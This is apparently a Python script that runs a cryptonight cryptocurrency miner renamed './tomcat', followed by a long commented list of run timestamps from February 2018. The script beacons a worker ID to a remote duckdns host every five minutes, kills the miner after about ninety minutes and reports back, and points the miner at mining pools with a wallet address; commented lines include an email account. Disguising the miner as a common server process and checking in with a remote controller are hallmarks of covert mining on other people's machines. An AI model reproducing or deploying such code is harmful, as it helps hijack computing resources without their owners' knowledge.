import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:06.822098
#2018-02-17 16:31:04.392434
#2018-02-17 18:19:01.786067
#2018-02-17 20:06:07.038269
#2018-02-17 21:53:04.581007
#2018-02-17 23:38:06.147062
#2018-02-18 01:27:06.108683
#2018-02-18 03:14:04.230034
#2018-02-18 05:02:05.427234
#2018-02-18 06:55:06.376086
#2018-02-18 08:43:01.493626
#2018-02-18 10:29:04.122463
#2018-02-18 12:15:05.013698
#2018-02-18 14:01:07.661486
#2018-02-18 15:51:05.702147
#2018-02-18 17:41:06.725966
#2018-02-18 19:28:02.123747
#2018-02-18 21:13:04.781270
#2018-02-18 23:01:03.423557
#2018-02-19 00:48:01.923042
#2018-02-19 02:35:05.058144
#2018-02-19 04:21:06.369976
#2018-02-19 06:06:01.650778
#2018-02-19 07:54:01.515937
#2018-02-19 09:44:06.299564
#2018-02-19 11:34:02.124723
#2018-02-19 13:20:08.889138
#2018-02-19 15:09:08.007590
#2018-02-19 16:56:06.147546
#2018-02-19 18:44:11.551243
#2018-02-19 20:31:08.191789
#2018-02-19 22:18:07.307057
#2018-02-20 00:03:08.968541
#2018-02-20 01:50:01.627004
#2018-02-20 03:39:04.747810
#2018-02-20 05:25:07.354709
#2018-02-20 07:09:07.055583
#2018-02-20 08:55:01.327568
#2018-02-20 10:39:05.836796
#2018-02-20 12:25:05.807051
#2018-02-20 14:12:07.823673
#2018-02-20 15:56:05.476581
#2018-02-20 17:42:04.881242
#2018-02-20 19:31:08.295502
#2018-02-20 21:20:07.060017
#2018-02-20 23:04:04.081445
#2018-02-21 00:49:06.057858
#2018-02-21 02:35:03.728443
#2018-02-21 04:23:08.494133
#2018-02-21 06:09:06.117883
#2018-02-21 07:55:14.825164
#2018-02-21 09:40:10.580958
#2018-02-21 11:31:05.992079
#2018-02-21 13:19:04.455605
#2018-02-21 15:04:04.804840
#2018-02-21 16:53:08.357546
#2018-02-21 18:43:08.387353
#2018-02-21 20:28:05.047330
#2018-02-21 22:16:05.060163
#2018-02-22 00:04:06.695813
#2018-02-22 01:51:01.405812
#2018-02-22 03:38:04.430203
#2018-02-22 05:25:07.150451
#2018-02-22 07:10:07.590056
#2018-02-22 08:57:05.844291
#2018-02-22 10:45:01.487308
#2018-02-22 12:31:01.838776
#2018-02-22 14:16:05.056266
#2018-02-22 16:05:10.906769
#2018-02-22 17:51:06.789983
#2018-02-22 19:38:06.980440
#2018-02-22 21:31:04.469753
#2018-02-22 23:18:05.560434
#2018-02-23 01:03:03.883389
#2018-02-23 02:49:05.148589
#2018-02-23 04:36:07.773683
#2018-02-23 06:22:06.780955
#2018-02-23 08:09:07.688112
#2018-02-23 10:24:07.139403
#2018-02-23 12:18:06.832006
#2018-02-23 14:07:03.711631
#2018-02-23 15:57:07.171749
#2018-02-23 17:41:07.497136
#2018-02-23 19:28:09.255428
#2018-02-23 21:13:06.501209
#2018-02-23 22:58:02.182260
#2018-02-24 00:46:03.405447
#2018-02-24 02:33:08.081440
#2018-02-24 04:26:04.814445
#2018-02-24 06:11:05.569736
#2018-02-24 07:58:06.433466
#2018-02-24 09:41:07.243369
#2018-02-24 11:37:07.573300
#2018-02-24 13:27:07.309670
#2018-02-24 15:16:03.919926
#2018-02-24 17:05:06.902324
#2018-02-24 18:56:03.882048
#2018-02-24 20:43:01.283420
#2018-02-25 01:14:04.384592
#2018-02-25 05:06:03.837214
#2018-02-25 10:05:01.365345